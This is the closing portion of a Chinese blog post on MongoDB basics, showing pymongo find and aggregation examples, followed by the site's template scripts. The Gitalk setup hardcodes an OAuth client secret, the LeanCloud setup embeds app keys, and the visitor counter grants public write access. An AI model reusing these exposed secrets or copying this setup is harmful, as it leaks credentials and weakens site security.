<span class="n">cursor</span> <span class="o">=</span> <span class="n">db</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"instock.qty"</span><span class="p">:</span> <span class="p">{</span><span class="s">"$gt"</span><span class="p">:</span> <span class="mi">10</span><span class="p">,</span> <span class="s">"$lte"</span><span class="p">:</span> <span class="mi">20</span><span class="p">}})</span>


<span class="n">cursor</span> <span class="o">=</span> <span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">(</span>
    <span class="p">{</span><span class="s">"size"</span><span class="p">:</span> <span class="n">SON</span><span class="p">(</span>
        <span class="p">[(</span><span class="s">"h"</span><span class="p">,</span> <span class="mi">14</span><span class="p">),</span> <span class="p">(</span><span class="s">"w"</span><span class="p">,</span> <span class="mi">21</span><span class="p">),</span> <span class="p">(</span><span class="s">"uom"</span><span class="p">,</span> <span class="s">"cm"</span><span class="p">)]</span>
    <span class="p">)}</span>
<span class="p">)</span>

<span class="n">inventory</span><span class="o">.</span><span class="n">find_one</span><span class="p">({</span><span class="s">"size.uom"</span><span class="p">:</span> <span class="s">"in"</span><span class="p">})</span>
<span class="n">output</span><span class="p">(</span><span class="n">inventory</span><span class="o">.</span><span class="n">find</span><span class="p">({</span><span class="s">"size.uom"</span><span class="p">:</span> <span class="s">"cm"</span><span class="p">}))</span>



<span class="c"># 聚合</span>
<span class="n">query</span> <span class="o">=</span> <span class="p">[</span>
    <span class="c"># {'$match': {'a': 1}},</span>
    <span class="p">{</span>
        <span class="s">'$group'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s">'_id'</span><span class="p">:</span> <span class="s">"$name"</span><span class="p">,</span>
            <span class="s">'a'</span><span class="p">:</span> <span class="p">{</span><span class="s">'$sum'</span><span class="p">:</span> <span class="mi">1</span><span class="p">},</span>
            <span class="s">'b'</span><span class="p">:</span> <span class="p">{</span><span class="s">'$max'</span><span class="p">:</span> <span class="s">'$alexa'</span><span class="p">},</span>
        <span class="p">}</span>
    <span class="p">},</span>
    <span class="p">{</span><span class="s">'$sort'</span><span class="p">:</span> <span class="p">{</span><span class="s">'a'</span><span class="p">:</span> <span class="n">pymongo</span><span class="o">.</span><span class="n">ASCENDING</span><span class="p">}},</span>
    <span class="p">{</span><span class="s">'$sort'</span><span class="p">:</span> <span class="p">{</span><span class="s">'b'</span><span class="p">:</span> <span class="n">pymongo</span><span class="o">.</span><span class="n">DESCENDING</span><span class="p">}},</span>
    <span class="p">{</span><span class="s">'$limit'</span><span class="p">:</span> <span class="mi">20</span><span class="p">},</span>
    <span class="p">{</span><span class="s">'$match'</span><span class="p">:</span> <span class="p">{</span><span class="s">'a'</span><span class="p">:</span> <span class="mi">1</span><span class="p">}},</span>

<span class="p">]</span>
<span class="c"># select _id, sum(*) as a, max(alexa) as b  from xx group by name as _id having a=1 order by a asce, b desc</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">site</span><span class="o">.</span><span class="n">aggregate</span><span class="p">(</span><span class="n">query</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
    
    



</code></pre></td></tr></tbody></table></div></div>



      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      wyx
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="/blog/2019/04/17/mongo-base" title="mongo 概念">/blog/2019/04/17/mongo-base</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2019/04/26/captcha" rel="next" title="验证码反爬">
                <i class="fa fa-chevron-left"></i> 验证码反爬
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2019/04/12/windows-function" rel="prev" title="窗口函数 分析函数">
                窗口函数 分析函数 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="gitalk-container"></div>
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="wyx" />
          <p class="site-author-name" itemprop="name">wyx</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">195</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/">
                <span class="site-state-item-count">27</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">32</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
        
        

        <div class="links-of-author motion-element">
          
            
              
              
              <span class="links-of-author-item">
                <a href="https://github.com/631068264" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://stackoverflow.com/users/5360312/wyx" target="_blank" title="StackOverflow">
                  
                    <i class="fa fa-fw fa-stack-overflow"></i>
                  
                  StackOverflow
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class=nav>
      <li class="nav-item nav-level-1"> <a class="nav-link" href="#概念"> <span class="nav-number">1</span> <span class="nav-text">概念</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#集合"> <span class="nav-number">2</span> <span class="nav-text">集合</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#capped-collections"> <span class="nav-number">2.1</span> <span class="nav-text">capped collections</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#元数据"> <span class="nav-number">3</span> <span class="nav-text">元数据</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#文档document"> <span class="nav-number">4</span> <span class="nav-text">文档(Document)</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#数据类型"> <span class="nav-number">5</span> <span class="nav-text">数据类型</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#连接"> <span class="nav-number">6</span> <span class="nav-text">连接</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#操作"> <span class="nav-number">7</span> <span class="nav-text">操作</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#database"> <span class="nav-number">7.1</span> <span class="nav-text">database</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#集合-1"> <span class="nav-number">7.2</span> <span class="nav-text">集合</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#select"> <span class="nav-number">8</span> <span class="nav-text">select</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#条件比较"> <span class="nav-number">8.1</span> <span class="nav-text">条件比较</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#and"> <span class="nav-number">8.2</span> <span class="nav-text">and</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#or"> <span class="nav-number">8.3</span> <span class="nav-text">or</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#模糊"> <span class="nav-number">8.4</span> <span class="nav-text">模糊</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#索引"> <span class="nav-number">9</span> <span class="nav-text">索引</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#pymongo"> <span class="nav-number">10</span> <span class="nav-text">pymongo</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#connect"> <span class="nav-number">10.1</span> <span class="nav-text">connect</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#insert"> <span class="nav-number">10.2</span> <span class="nav-text">insert</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#update"> <span class="nav-number">10.3</span> <span class="nav-text">update</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#delete"> <span class="nav-number">10.4</span> <span class="nav-text">delete</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#bulk"> <span class="nav-number">10.5</span> <span class="nav-text">bulk</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#select-1"> <span class="nav-number">10.6</span> <span class="nav-text">select</span> </a> </li> </ol> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  
  &copy;  2018 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wyx</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://jekyllrb.com">Jekyll</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/simpleyyt/jekyll-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  






<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var labels = ['gitalk','2019-04-17']
</script>

<script type="text/javascript">
    labels.push('mongo');
</script>



<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: 'dd688ffd2be8512fc659',
        clientSecret: '483255bda7b80acb108df487ac91a0be78710b0d',
        repo: '631068264.github.io',
        owner: '631068264',
        admin: ['631068264'],
        id: 'mongo 概念',
        title: 'mongo 概念',
        labels: labels,
        perPage: 50,
        distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
</script>







  




  

    

  







  


  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("MQfAJm2nTUDaT5bEuS8i4Ygm-gzGzoHsz", "m4tqv3N9AepVgTk0YfSNe9kz");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  


  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

  <!--custom css in _sass/_custom/custom.scss -->

<script type="text/javascript">
    // 黑幕提示语
    $('span.heimu').attr('title', '你知道得太多了');
</script>

<script type="text/javascript">
    // 多图显示 gp-列数
    $('span[class^="gp-"]').each(function () {
        var div_mulp = $(this);
        if (div_mulp && div_mulp.attr('class')) {
            var column_number = parseInt(div_mulp.attr('class').split('-')[1]);
            var image = div_mulp.find('img');
            if (image.size() > 0) {
                div_mulp.removeClass()
                    .addClass('post-gallery')
                    .attr('itemscope', '')
                    .attr('itemtype', 'http://schema.org/ImageGallery');

                image.each(function (index) {
                    var modulo = index % column_number;

                    if (modulo === 0) {
                        content = $('<div class="post-gallery-row"></div>')
                    }
                    var image_src = $(this).attr('src');
                    content.append('<a class="post-gallery-img fancybox"\n' +
                        '                 href="' + image_src + '" rel="gallery_"\n' +
                        '                 itemscope itemtype="http://schema.org/ImageObject" itemprop="url">\n' +
                        '                <img src="' + image_src + '" itemprop="contentUrl"/>\n' +
                        '              </a>');

                    if (modulo === column_number - 1) {
                        div_mulp.append(content)
                    }
                });

                var photo_size_modulo = image.size() % column_number;
                if (photo_size_modulo > 0) {
                    div_mulp.append(content);
                }
                image.remove();
            }
        }
    });


</script>
</body>
</html>

